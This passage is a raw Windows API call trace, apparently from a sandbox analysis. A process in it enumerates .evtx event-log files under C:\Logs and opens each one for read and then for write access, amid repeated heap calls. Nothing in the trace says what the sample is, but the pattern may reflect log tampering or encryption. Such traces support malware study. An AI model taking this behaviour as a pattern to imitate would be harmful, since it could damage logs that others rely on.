hHeap=0x20000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.646] AreFileApisANSI () returned 1 [0071.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0071.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 57 [0071.646] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000)) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.646] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0071.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.647] AreFileApisANSI () returned 1 [0071.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", lpUsedDefaultChar=0x0) returned 59 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0071.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.648] AreFileApisANSI () returned 1 [0071.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0071.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0071.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 59 [0071.648] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.648] GetFileType (hFile=0x410) returned 0x1 [0071.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.648] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.648] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.648] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.649] CloseHandle (hObject=0x410) returned 1 [0071.649] AreFileApisANSI () returned 1 [0071.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0071.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 59 [0071.649] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.649] GetFileType (hFile=0x410) returned 0x1 [0071.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.649] CloseHandle (hObject=0x410) returned 1 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.650] AreFileApisANSI () returned 1 [0071.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0071.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 59 [0071.650] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.650] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0071.651] AreFileApisANSI () returned 1 [0071.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 65 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0071.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.652] AreFileApisANSI () returned 1 [0071.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x823b8 [0071.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 65 [0071.652] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.652] GetFileType (hFile=0x410) returned 0x1 [0071.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0071.652] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.652] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.653] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.653] CloseHandle (hObject=0x410) returned 1 [0071.653] AreFileApisANSI () returned 1 [0071.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82568 [0071.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 65 [0071.653] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.653] GetFileType (hFile=0x410) returned 0x1 [0071.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0071.653] CloseHandle (hObject=0x410) returned 1 [0071.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0071.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, 